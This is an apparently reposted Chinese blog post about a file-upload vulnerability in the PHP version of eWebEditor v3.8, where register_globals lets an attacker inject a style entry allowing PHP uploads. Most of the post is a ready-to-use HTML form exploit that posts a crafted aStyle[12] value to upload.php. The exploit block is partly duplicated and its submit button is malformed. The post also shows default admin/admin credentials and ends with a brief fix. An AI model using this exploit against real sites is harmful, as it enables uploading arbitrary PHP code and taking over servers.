此漏洞仅测试了最新版v3.8,不知道低版本是否存在此漏洞。PHP版本的ewebeditor并没有使用数据库来保存配置信息,所有信息位于php/config.php中,代码如下:
<?php
$sUsername = "admin";
$sPassword = "admin";
$sPassword = "admin";
$aStyle[1] = "gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1";
........
它将所有的风格配置信息保存为一个数组$aStyle,在register_global为on的情况下我们可以任意添加自己喜欢的风格,然后就可以在自己添加的风格中可以随意定义可上传文件类型。
这漏洞成因很简单,下面给个exp
<form action="" method=post enctype="multipart/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url value=" http://192.168.1.110/eWebEditor/" size=100><br>
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
file:<input type=file name="uploadfile"><br>
<input type=button value=submit
</form><br>
<script>
function fsubmit(){
form = document.forms[0];
form.action = form.url.value+'php/upload.php?action=save&type=FILE&style=toby57&language=en';
alert(form.action);
form.submit();
}
</script>
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url value=" http://192.168.1.110/eWebEditor/" size=100><br>
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
file:<input type=file name="uploadfile"><br>
<input type=button value=submit
</form><br>
<script>
function fsubmit(){
form = document.forms[0];
form.action = form.url.value+'php/upload.php?action=save&type=FILE&style=toby57&language=en';
alert(form.action);
form.submit();
}
</script>
漏洞修补方法:
初始化数组$aStyle
<?php
$sUsername = "admin";
$sPassword = "admin";
$sPassword = "admin";
$aStyle = array();
$aStyle[1] = "gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1";
本文转自 小王 51CTO博客,原文链接:http://blog.51cto.com/xiaowang/300809,如需转载请自行联系原作者
